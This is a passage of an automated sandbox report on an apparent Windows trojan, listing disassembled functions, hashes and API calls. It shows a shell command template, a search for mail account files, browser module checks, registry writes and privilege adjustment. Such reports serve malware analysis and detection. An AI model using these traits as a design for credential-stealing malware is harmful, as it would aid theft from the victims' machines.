  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
